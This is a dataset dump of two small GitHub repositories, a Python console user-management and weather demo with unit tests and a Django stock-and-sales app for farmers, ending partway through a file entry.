| Column | Type | Observed range / values |
| --- | --- | --- |
| repo_name | string | length 5 to 114 |
| repo_url | string | length 24 to 133 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| directory_id | string | length 40 |
| branch_name | string (categorical) | 209 values |
| visit_date | timestamp[ns] | |
| revision_date | timestamp[ns] | |
| committer_date | timestamp[ns] | |
| github_id | int64 | 9.83k to 683M |
| star_events_count | int64 | 0 to 22.6k |
| fork_events_count | int64 | 0 to 4.15k |
| gha_license_id | string (categorical) | 17 values |
| gha_created_at | timestamp[ns] | |
| gha_updated_at | timestamp[ns] | |
| gha_pushed_at | timestamp[ns] | |
| gha_language | string (categorical) | 115 values |
| files | list | length 1 to 13.2k |
| num_files | int64 | 1 to 13.2k |
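The listing above is a flattened dataset-viewer schema: each column name followed by its dtype and the observed range of lengths or values. As a minimal sketch of how records shaped like this could be walked, assuming each row is stored as one JSON object per line; the `rows.jsonl` file name is a placeholder and not part of the dump, while the field names (`repo_name`, `branch_name`, `num_files`, `files`, `path`, `language`, `length_bytes`) come from the schema and rows shown here:

```python
import json

# Sketch: iterate over rows shaped like the schema above.
# Assumption: rows live one JSON object per line in "rows.jsonl" (placeholder name).
with open("rows.jsonl", encoding="utf-8") as fh:
    for line in fh:
        row = json.loads(line)
        # Top-level repository metadata columns.
        print(row["repo_name"], row["branch_name"], row["num_files"])
        # "files" is a list of per-file dicts (see the rows below for the keys).
        for f in row["files"]:
            print("  ", f["path"], f["language"], f["length_bytes"])
```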
repo_name: renukartamboli/assignment
repo_url: https://github.com/renukartamboli/assignment
snapshot_id: 02ca5df5f66a3fec01f569ad6b1ff79a48c14252
revision_id: 869e86d337c82bfe0b9f500b0a5fa9daee5c59aa
directory_id: 67c698098ed62c61f33f5bb502e420772d6f7a63
branch_name: refs/heads/main
visit_date: 2023-09-04T14:31:45.973309
revision_date: 2021-10-31T16:15:19
committer_date: 2021-10-31T16:15:19
github_id: 421,112,056
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.7692307829856873, "alphanum_fraction": 0.7692307829856873, "avg_line_length": 14, "blob_id": "0f585798828eafc1509cc3877a44db747ccf9c60", "content_id": "8d81f1afe4308f29ff8d83ed65365397ca572413", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 91, "license_type": "no_license", "max_line_length": 45, "num_lines": 6, "path": "/README.md", "repo_name": "renukartamboli/assignment", "src_encoding": "UTF-8", "text": "\npython -m unittest unitTests.py to run tests.\n\n\n\n\npython assignment.py to run application\n" }, { "alpha_fraction": 0.5149713158607483, "alphanum_fraction": 0.529411792755127, "avg_line_length": 37.923728942871094, "blob_id": "a684270593291c7c56db335ddc989c39dbc0764c", "content_id": "7e0871318f4221b2472f5214561de5814ee72570", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4709, "license_type": "no_license", "max_line_length": 453, "num_lines": 118, "path": "/assignment.py", "repo_name": "renukartamboli/assignment", "src_encoding": "UTF-8", "text": "from cryptography.fernet import Fernet\r\nclass Switcher(object):\r\n users = {}\r\n weatherInformation= {\"goa\":{\"humidity\":5,\"Pressure\":6,\"Average Temperature\":30,\"Wind Speed\":5,\"Wind Degree\":9,\"UI index\":12},\"jaipur\":{\"humidity\":5,\"Pressure\":6,\"Average Temperature\":30,\"Wind Speed\":5,\"Wind Degree\":9,\"UI index\":12},\"banglore\":{\"humidity\":5,\"Pressure\":6,\"Average Temperature\":30,\"Wind Speed\":5,\"Wind Degree\":9,\"UI index\":12},\"-90/+90\":{\"humidity\":5,\"Pressure\":6,\"Average Temperature\":30,\"Wind Speed\":5,\"Wind Degree\":9,\"UI index\":12}}\r\n key = Fernet.generate_key()\r\n cipherSuite = Fernet(key)\r\n def __init__(self):\r\n Switcher.users = {'testUser':Switcher.cipherSuite.encrypt('123'.encode())}\r\n def Operation(self,method_name):\r\n method=getattr(self,method_name,lambda :'Invalid')\r\n return method()\r\n \r\n def create(self):\r\n print(\"enter user name:\")\r\n user = input()\r\n print(\"enter password:\")\r\n password = input()\r\n Switcher.users[user]=Switcher.cipherSuite.encrypt(password.encode())\r\n print(\"User created Successfully!!\")\r\n \r\n def update(self):\r\n print(\"Enter your userName to update\")\r\n user = input()\r\n password = Switcher.users[user]\r\n print(\"Do you want to update username? y/n\")\r\n ans = input()\r\n if(ans == \"y\"):\r\n print(\"Enter new userName\")\r\n enteredUser = input()\r\n print(\"Enter your password\")\r\n i =3\r\n p=0\r\n while(i!=0):\r\n enteredPass = input()\r\n if(Switcher.cipherSuite.decrypt(password).decode()==enteredPass):\r\n del Switcher.users[user]\r\n Switcher.users[enteredUser] = password\r\n print(\"Username updated successfully\")\r\n p=1\r\n break\r\n else:\r\n print(\"incorrect password\")\r\n i-=1\r\n if(p!=1):\r\n print(\"Incorrect password attemp 3 times.Please try again later.\")\r\n print(\"Do you want to update password? 
y/n\")\r\n ans = input()\r\n if(ans==\"y\"):\r\n print(\"Enter old password\")\r\n i=3\r\n while(i!=0):\r\n enteredPass = input()\r\n if(Switcher.cipherSuite.decrypt(password).decode()==enteredPass):\r\n print(\"enter new password\")\r\n newPass = input()\r\n Switcher.users[user]=Switcher.cipherSuite.encrypt(password)\r\n p=1\r\n print(\"Password updated Successfully!!\")\r\n break\r\n else:\r\n print(\"incorrect password\")\r\n i-=1\r\n if(p!=1):\r\n print(\"Incorrect password attemp 3 times.Please try again later.\")\r\n \r\n \r\n \r\n def delete(self):\r\n print(\"Enter user name to delete\")\r\n user = input()\r\n del Switcher.users[user]\r\n print(\"User deleted Successfully\")\r\n\r\n def readAll(self):\r\n print(\"User Entries:\")\r\n for key,value in Switcher.users.items():\r\n print(key,end=\"\\t\")\r\n print(\"\\n\")\r\n\r\n def weatherInfo(self):\r\n print(\"Enter City Name or Longitude and Latitude in following manner: Longitude/Latitude\")\r\n location = input()\r\n if(location not in Switcher.weatherInformation.keys()):\r\n print(\"no weather info for this location\")\r\n return\r\n for info in Switcher.weatherInformation[location]:\r\n print(info,':',Switcher.weatherInformation[location][info])\r\n\r\n def helpCmd(self):\r\n return \"Press 1 for creating new user \\n Press 2 to update user \\n Press 3 to delete user \\n Press 4 to print all users \\n Press 5 for weather information \\n --help for help command\"\r\n \r\nif __name__ == \"__main__\":\r\n s=Switcher()\r\n Choice = 0\r\n while(Choice!=\"exit\"):\r\n print(\"\\n\")\r\n print(\"Enter your Choice:\")\r\n print(\"1 - creating new user\")\r\n print(\"2 - update user\")\r\n print(\"3 - delete user\")\r\n print(\"4 - print all users\")\r\n print(\"5 - weather information\")\r\n print(\"--help for help command\")\r\n print(\"Type exit to quit\")\r\n print(\"\\n\")\r\n Choice = input()\r\n if(Choice==\"--help\"):\r\n print(s.Operation('helpCmd'))\r\n if(Choice=='1'):\r\n s.Operation('create')\r\n if(Choice=='2'):\r\n s.Operation('update')\r\n if(Choice=='3'):\r\n s.Operation('delete')\r\n if(Choice=='4'):\r\n s.Operation('readAll')\r\n if(Choice=='5'):\r\n s.Operation('weatherInfo')" }, { "alpha_fraction": 0.6254940629005432, "alphanum_fraction": 0.6403161883354187, "avg_line_length": 37.72549057006836, "blob_id": "922ce237cd78d6553d3f2e65d6a471e04fad5eec", "content_id": "c333cdfcdb020af06ca18582b78cb0639471ba68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2024, "license_type": "no_license", "max_line_length": 232, "num_lines": 51, "path": "/unitTests.py", "repo_name": "renukartamboli/assignment", "src_encoding": "UTF-8", "text": "import unittest\r\nimport builtins\r\nimport pytest\r\nimport io\r\nimport unittest.mock\r\nfrom unittest.mock import patch\r\nfrom assignment import Switcher\r\n\r\n\r\nclass TestMethods(unittest.TestCase): \r\n \r\n def testhelp(self):\r\n swicther = Switcher()\r\n self.assertEqual(swicther.Operation('helpCmd'), \"Press 1 for creating new user \\n Press 2 to update user \\n Press 3 to delete user \\n Press 4 to print all users \\n Press 5 for weather information \\n --help for help command\")\r\n\r\n @unittest.mock.patch('sys.stdout', new_callable=io.StringIO)\r\n def assert_stdout(self,operation,expected_output, mock_stdout):\r\n swicther = Switcher()\r\n swicther.Operation(operation) \r\n self.assertEqual(mock_stdout.getvalue(), expected_output)\r\n\r\n def testReadUsers(self):\r\n self.assert_stdout('readAll','User 
Entries:\\ntestUser\\t\\n\\n')\r\n \r\n def testDeleteUsers(self):\r\n swicther = Switcher()\r\n original_input = builtins.input\r\n builtins.input = lambda: 'testUser'\r\n swicther.Operation('delete')\r\n self.assertEqual(swicther.users,{})\r\n\r\n def testWeatherInfo(self):\r\n original_input = builtins.input\r\n builtins.input = lambda: 'goa'\r\n self.assert_stdout('weatherInfo','Enter City Name or Longitude and Latitude in following manner: Longitude/Latitude\\nhumidity : 5\\nPressure : 6\\nAverage Temperature : 30\\nWind Speed : 5\\nWind Degree : 9\\nUI index : 12\\n')\r\n \r\n def testUpdateUser(self):\r\n mock_args = ['testUser','y','testUser1','234','123','y','123','123']\r\n with unittest.mock.patch('builtins.input', side_effect=mock_args):\r\n swicther = Switcher()\r\n swicther.Operation('update')\r\n \r\n def testCreateUser(self):\r\n mock_args = ['testUser1','123']\r\n with unittest.mock.patch('builtins.input', side_effect=mock_args):\r\n swicther = Switcher()\r\n swicther.Operation('create')\r\n \r\n\r\nif __name__ == '__main__':\r\n unittest.main()" } ]
num_files: 3
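Each row's `files` entry nests per-file metadata (`path`, `language`, `length_bytes`, `num_lines`, `alpha_fraction`, and so on). A small sketch of selecting just the Python sources from such a record; the `row` literal below is trimmed from the first record above, keeping only the keys this snippet touches:

```python
# Sketch: pick the Python files of one parsed record and sort them by size.
# The values are copied from the renukartamboli/assignment row above.
row = {
    "repo_name": "renukartamboli/assignment",
    "files": [
        {"path": "/README.md", "language": "Markdown", "length_bytes": 91, "num_lines": 6},
        {"path": "/assignment.py", "language": "Python", "length_bytes": 4709, "num_lines": 118},
        {"path": "/unitTests.py", "language": "Python", "length_bytes": 2024, "num_lines": 51},
    ],
}

py_files = [f for f in row["files"] if f["language"] == "Python"]
for f in sorted(py_files, key=lambda f: f["length_bytes"], reverse=True):
    print(f"{f['path']:20s} {f['length_bytes']:>6d} bytes  {f['num_lines']:>4d} lines")
```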
repo_name: kiamasimon/efarmer
repo_url: https://github.com/kiamasimon/efarmer
snapshot_id: 4755c6a38cf225011816879cc6cfb4e402a54f30
revision_id: c920dd4d16085ecedd9f0e43e25b155142c28113
directory_id: fd8739d56b3f5635f407aeb341e59f76599a090d
branch_name: refs/heads/master
visit_date: 2020-05-30T06:09:03.681382
revision_date: 2019-05-31T14:40:24
committer_date: 2019-05-31T14:40:24
github_id: 189,573,481
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.6736990213394165, "alphanum_fraction": 0.6891701817512512, "avg_line_length": 34.5, "blob_id": "7f83978635437347f702806d098e176dbe398f63", "content_id": "99ca02a1cb430cca3c7a87ec8216a99d20f8d033", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 711, "license_type": "no_license", "max_line_length": 100, "num_lines": 20, "path": "/README.md", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "# Efarmer\nDjango E-FARMER DEMO\n\n### Setting up\n##### Install and set up python virtual environment\n reference : http://timmyreilly.azurewebsites.net/python-pip-virtualenv-installation-on-windows/\n##### Download the project from the link provided\n Start your virtual environment through command prompt:\n \\path\\to\\env\\Scripts\\activate\n Navigate to the location of the downloaded project: eg.\n cd /Desktop/efarmer\n Use:\n pip install -r requirements.txt to install the projects requirements including django\n To run your development server, use:\n python manage.py runserver\n \n##### Requirements\n Django==2.2.1\n pytz==2019.1\n sqlparse==0.3.0\n\n" }, { "alpha_fraction": 0.5150115489959717, "alphanum_fraction": 0.5912240147590637, "avg_line_length": 21.789474487304688, "blob_id": "26af5609215349fe25138a97c909c3c24bb4eb48", "content_id": "d5266c23d010f1bcfd06499777ba51ad616b7e05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 433, "license_type": "no_license", "max_line_length": 50, "num_lines": 19, "path": "/accountant/migrations/0006_product_number_of_units.py", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.1 on 2019-05-31 07:44\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accountant', '0005_auto_20190526_1836'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='product',\n name='number_of_units',\n field=models.IntegerField(default=12),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 0.4169014096260071, "alphanum_fraction": 0.4187793433666229, "avg_line_length": 28.61111068725586, "blob_id": "0448f62a9145d4bd38e5c9c878c337e279d0f50d", "content_id": "bdb86b2b6107643c1c41c122f0a2fa6c06573c11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1065, "license_type": "no_license", "max_line_length": 108, "num_lines": 36, "path": "/accountant/templates/accountant/sales.html", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "{% extends 'layouts/base.html' %}\n{% load static %}\n\n{% block content %}\n<div class=\"col-xs-12\">\n<div class=\"card\">\n <div class=\"card-header\">\n <strong>Stocks</strong>\n <a class=\"btn btn-success pull-right\" href=\"{% url 'Accountant:add_sale' customer.id%}\">Add Sale</a>\n </div>\n <div class=\"card-body\">\n <div class=\"table-flip-scroll table-responsive\">\n <table class=\"table table-striped dataTable\">\n <thead>\n <tr>\n <th>Product Name</th>\n <th>Price</th>\n <th>Units</th>\n </tr>\n </thead>\n <tbody>\n {% for sale in customer_sales %}\n <tr>\n <td><a href=\"\">{{ sale.product.name }}</a></td>\n <td>{{ sale.price_per_unit }}</td>\n <td>{{ sale.units_sold }}</td>\n </tr>\n {% endfor %}\n </tbody>\n </table>\n\n </div>\n </div>\n</div>\n</div>\n{% endblock %}" }, { "alpha_fraction": 0.696571409702301, "alphanum_fraction": 0.7068571448326111, "avg_line_length": 28.183332443237305, 
"blob_id": "fb73fee79190870a5da78e7c6c4cdddf553b07ae", "content_id": "c187b463a8165e2b4b9992f8c44893849aaa92bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1750, "license_type": "no_license", "max_line_length": 70, "num_lines": 60, "path": "/accountant/models.py", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "from django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import User\nfrom django.db import models\n\n# Create your models here.\n\n\nclass Accountant(get_user_model()):\n location = models.CharField(max_length=100, null=True, blank=True)\n\n class Meta:\n verbose_name = 'Accountant'\n\n\nclass Admin_User(get_user_model()):\n location = models.CharField(max_length=100, null=True, blank=True)\n\n class Meta:\n verbose_name = 'Admin'\n\n\nclass Stock(models.Model):\n name = models.CharField(max_length=250)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n class Meta:\n verbose_name = 'Stock'\n\n\nclass Product(models.Model):\n name = models.CharField(max_length=250)\n number_of_units = models.IntegerField()\n stock = models.ForeignKey(Stock, on_delete=models.CASCADE)\n buying_price = models.IntegerField()\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n class Meta:\n verbose_name = 'Product'\n\n\nclass Customer(models.Model):\n first_name = models.CharField(max_length=250)\n last_name = models.CharField(max_length=250)\n phone_number = models.IntegerField()\n\n\nclass Sale(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n customer = models.ForeignKey(Customer, on_delete=models.CASCADE)\n product = models.ForeignKey(Product, on_delete=models.CASCADE)\n units_sold = models.IntegerField()\n price_per_unit = models.IntegerField()\n total = models.IntegerField()\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n class Meta:\n verbose_name = 'Sale'" }, { "alpha_fraction": 0.6438679099082947, "alphanum_fraction": 0.6438679099082947, "avg_line_length": 20.769229888916016, "blob_id": "a9a26f23aed5db7efc6c777d212f805d9e267fff", "content_id": "3a8a595176288e5ec0bf1ce1f9e597ee70db5a53", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 848, "license_type": "no_license", "max_line_length": 89, "num_lines": 39, "path": "/accountant/forms.py", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "from django.contrib.auth.forms import UserCreationForm\nfrom django.forms import ModelForm\n\nfrom accountant.models import Accountant, Product, Sale, Stock, Customer\n\n\nclass SignUpForm(UserCreationForm):\n\n class Meta:\n model = Accountant\n fields = ('username', 'first_name', 'last_name', 'email', 'location')\n\n\nclass AddStockForm(ModelForm):\n\n class Meta:\n model = Stock\n fields = ('name',)\n\n\nclass AddCustomerForm(ModelForm):\n\n class Meta:\n model = Customer\n fields = ('first_name', 'last_name', 'phone_number')\n\n\nclass AddProductForm(ModelForm):\n\n class Meta:\n model = Product\n fields = ('name', 'stock', 'buying_price')\n\n\nclass AddSaleForm(ModelForm):\n\n class Meta:\n model = Sale\n fields = ('user', 'customer', 'product', 'price_per_unit', 'units_sold', 'total')" }, { "alpha_fraction": 0.5530726313591003, "alphanum_fraction": 0.5810055732727051, "avg_line_length": 30.964284896850586, "blob_id": 
"e2e2c343c00d108d689f9cf5d3c2704dcbaf057d", "content_id": "41431e34f6c6bf2c5934731c5f88ccf1834347b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 895, "license_type": "no_license", "max_line_length": 114, "num_lines": 28, "path": "/accountant/migrations/0008_auto_20190531_0752.py", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.1 on 2019-05-31 07:52\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accountant', '0007_sale_customer_name'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Customer',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('first_name', models.CharField(max_length=250)),\n ('last_name', models.CharField(max_length=250)),\n ('phone_number', models.IntegerField()),\n ],\n ),\n migrations.AlterField(\n model_name='sale',\n name='customer_name',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='accountant.Customer'),\n ),\n ]\n" }, { "alpha_fraction": 0.4932975769042969, "alphanum_fraction": 0.5764074921607971, "avg_line_length": 19.72222137451172, "blob_id": "2ff397cb3cf76c4fa69b2f6c3459e8971b48c6b0", "content_id": "73311276aeb4bdf302d4801515b421e3d13446ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 373, "license_type": "no_license", "max_line_length": 50, "num_lines": 18, "path": "/accountant/migrations/0009_auto_20190531_0845.py", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.1 on 2019-05-31 08:45\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accountant', '0008_auto_20190531_0752'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='sale',\n old_name='customer_name',\n new_name='customer',\n ),\n ]\n" }, { "alpha_fraction": 0.6323162317276001, "alphanum_fraction": 0.6323162317276001, "avg_line_length": 32.410255432128906, "blob_id": "244e12e6b8d25bc201fa119ca38df61bc2cb9150", "content_id": "076a3915396610ef2babf25329905921b494e537", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5211, "license_type": "no_license", "max_line_length": 99, "num_lines": 156, "path": "/accountant/views.py", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "from django.contrib import messages\nfrom django.contrib.auth import authenticate, login\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom accountant.forms import SignUpForm, AddProductForm, AddStockForm, AddCustomerForm, AddSaleForm\nfrom accountant.models import Accountant, Admin_User, Stock, Product, Customer, Sale\n\napp_name = 'Accountant'\n\n\ndef landing(request):\n return render(request, 'accountant/landing_page.html')\n\n\ndef sign_up(request):\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n print(form)\n # pdb.set_trace()\n if form.is_valid():\n farmer = form.save(commit=False)\n farmer.save()\n username = form.cleaned_data.get('username')\n raw_password = form.cleaned_data.get('password')\n user = authenticate(username=username, password=raw_password)\n login(request, user)\n return redirect('Farmer:my_sales')\n else:\n messages.error(request, 'Form Invalid')\n return redirect('Accounts:signup')\n else:\n form = 
SignUpForm()\n return render(request, 'registration/sign_up.html',{'form':form})\n\n\ndef sign_in(request):\n msg = []\n\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(username=username, password=password)\n\n if user is not None:\n if user.is_active:\n login(request, user)\n if Accountant.objects.filter(user_ptr_id=user.id).exists():\n return redirect('Accountant:dashboard')\n elif Admin_User.objects.filter(user_ptr_id=user.id).exists():\n return redirect('Accountant:dashboard')\n else:\n msg.append('You account has been deactivated!')\n else:\n msg.append('Invalid login')\n return render(request, 'registration/sign_in.html', {'errors':msg})\n\n\ndef stocks(request):\n stocks = Stock.objects.all()\n return render(request, 'accountant/view_stocks.html', {'stocks':stocks})\n\n\ndef new_stock(request):\n if request.method == 'POST':\n form = AddStockForm(request.POST)\n print(form)\n if form.is_valid():\n form.save()\n messages.success(request, 'Stock Added Successfully')\n return redirect('Accountant:stocks')\n else:\n messages.error(request, 'Invalid Details Please Try Again')\n return render(request, 'accountant/add_stock.html')\n\n\ndef products(request, stock_id):\n stock = Stock.objects.get(id=stock_id)\n products = Product.objects.filter(stock=stock)\n return render(request, 'accountant/view_products.html', {'products':products, 'stock':stock})\n\n\ndef new_product(request, stock_id):\n stock = Stock.objects.get(id=stock_id)\n form = AddProductForm(request.POST)\n\n if request.method == 'POST':\n print(form)\n if form.is_valid():\n form.save()\n messages.success(request,'Product Added Successfully')\n return redirect('Accountant:products', stock.id)\n else:\n messages.error(request, 'Failed to add the product')\n return redirect('Accountant:new_product', stock.id)\n else:\n form = AddProductForm()\n return render(request, 'accountant/add_product.html',{'stock':stock, 'form':form})\n\n\ndef dashboard(request):\n return render(request, 'layouts/base.html')\n\n\ndef customers(request):\n customers = Customer.objects.all()\n context = {\n 'customers': customers\n }\n return render(request, 'accountant/customers.html', context)\n\n\ndef add_customer(request):\n if request.method == 'POST':\n form = AddCustomerForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, 'Customer Added Successfully')\n return redirect('Accountant:customers')\n else:\n messages.error(request, 'Form Validation Failed')\n return redirect('Accountant:customers')\n return render(request, 'accountant/add_customer.html')\n\n\ndef sales(request, customer_id):\n customer = Customer.objects.get(id=customer_id)\n customer_sales = Sale.objects.filter(customer=customer)\n context = {\n 'customer': customer,\n 'customer_sales': customer_sales\n }\n return render(request, 'accountant/sales.html', context)\n\n\ndef add_sale(request, customer_id):\n admin = Admin_User.objects.get(user_ptr_id = request.user.id)\n customer = Customer.objects.get(id=customer_id)\n products = Product.objects.all()\n if request.method == 'POST':\n form = AddSaleForm(request.POST)\n print(form)\n if form.is_valid():\n form.save()\n messages.success(request, 'Sale added successfully')\n return redirect('Accountant:sales', customer_id)\n else:\n messages.error(request, 'Form Validation Failed')\n return redirect('Accountant:sales', customer_id)\n\n context = {\n 'admin': admin,\n 'customer': customer,\n 'products': products\n }\n return 
render(request, 'accountant/add_sale.html', context)" }, { "alpha_fraction": 0.5231441259384155, "alphanum_fraction": 0.5340611338615417, "avg_line_length": 34.78125, "blob_id": "003cb74b0831d0f5355d8bd9e9210a2c3bbf392d", "content_id": "24dd5f2ae828affc667ecaa2b48039aa7623085e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2290, "license_type": "no_license", "max_line_length": 118, "num_lines": 64, "path": "/accountant/migrations/0003_auto_20190526_1816.py", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.1 on 2019-05-26 18:16\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('accountant', '0002_admin'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Product',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=250)),\n ('buying_price', models.IntegerField()),\n ],\n options={\n 'verbose_name': 'Product',\n },\n ),\n migrations.CreateModel(\n name='Stock',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=250)),\n ],\n options={\n 'verbose_name': 'Stock',\n },\n ),\n migrations.AlterModelOptions(\n name='accountant',\n options={'verbose_name': 'Accountant'},\n ),\n migrations.AlterModelOptions(\n name='admin',\n options={'verbose_name': 'Admin'},\n ),\n migrations.CreateModel(\n name='Sales',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('units_sold', models.IntegerField()),\n ('price_per_unit', models.IntegerField()),\n ('total', models.IntegerField()),\n ('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='accountant.Product')),\n ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name': 'Sale',\n },\n ),\n migrations.AddField(\n model_name='product',\n name='stock',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='accountant.Stock'),\n ),\n ]\n" }, { "alpha_fraction": 0.6740396022796631, "alphanum_fraction": 0.6740396022796631, "avg_line_length": 46.77777862548828, "blob_id": "c9d3bc36542bec8a53d05239f245eca4134ff0d6", "content_id": "3fa28024218ecd90dca7e1366905ea80e1dafb47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 859, "license_type": "no_license", "max_line_length": 80, "num_lines": 18, "path": "/accountant/urls.py", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "from django.urls import path\n\nfrom accountant import views\napp_name = 'Accountant'\nurlpatterns = [\n path('landing_page', views.landing, name='landing_page'),\n path('sign_up', views.sign_up, name='sign_up'),\n path('sign_in', views.sign_in, name='sign_in'),\n path('dashboard', views.dashboard, name='dashboard'),\n path('stocks', views.stocks, name='stocks'),\n path('products/<int:stock_id>', views.products, name='products'),\n path('new/product/<int:stock_id>', views.new_product, name='new_product'),\n path('new/stock', views.new_stock, name='new_stock'),\n path('customers', views.customers, name='customers'),\n 
path('customer/sales/<int:customer_id>', views.sales, name='sales'),\n path('add/customer', views.add_customer, name='add_customer'),\n path('add/customer/sale/<int:customer_id>', views.add_sale, name='add_sale')\n]" }, { "alpha_fraction": 0.5534883737564087, "alphanum_fraction": 0.6255813837051392, "avg_line_length": 21.63157844543457, "blob_id": "124b2358f30612cf1236a8bed7c42a74752dd5c6", "content_id": "3e1a39eb8bd7199b49f7732a2470c2807a3d771e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 430, "license_type": "no_license", "max_line_length": 66, "num_lines": 19, "path": "/accountant/migrations/0004_auto_20190526_1821.py", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.1 on 2019-05-26 18:21\n\nfrom django.conf import settings\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('accountant', '0003_auto_20190526_1816'),\n ]\n\n operations = [\n migrations.RenameModel(\n old_name='Sales',\n new_name='Sale',\n ),\n ]\n" }, { "alpha_fraction": 0.5444444417953491, "alphanum_fraction": 0.5933333039283752, "avg_line_length": 22.6842098236084, "blob_id": "ac14a83ce152629cacb1118d6ca9e5e7d13ea638", "content_id": "db60f4a84c291cc5ba6b0efa1f8aeaabeda25d2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 450, "license_type": "no_license", "max_line_length": 67, "num_lines": 19, "path": "/accountant/migrations/0007_sale_customer_name.py", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.1 on 2019-05-31 07:48\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accountant', '0006_product_number_of_units'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='sale',\n name='customer_name',\n field=models.CharField(default='simo', max_length=250),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 0.8177570104598999, "alphanum_fraction": 0.8177570104598999, "avg_line_length": 25.875, "blob_id": "8b6a8277ad8ccaa655ea26fc66c6f06eb867aa27", "content_id": "29df88a24fca8f28fef82b8fcf42e2fbb0aec96c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 214, "license_type": "no_license", "max_line_length": 59, "num_lines": 8, "path": "/accountant/admin.py", "repo_name": "kiamasimon/efarmer", "src_encoding": "UTF-8", "text": "from django.contrib import admin\n\n# Register your models here.\nfrom accountant.models import Admin_User, Accountant, Stock\n\nadmin.site.register(Admin_User)\nadmin.site.register(Accountant)\nadmin.site.register(Stock)" }, { "alpha_fraction": 0.44909611344337463, "alphanum_fraction": 0.45099905133247375, "avg_line_length": 29.941177368164062, "blob_id": "58f62f707c9aa9df15571a6bee7f9dd890680d95", "content_id": "d577a4192e80a8f719bb9764c029d24af01860ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 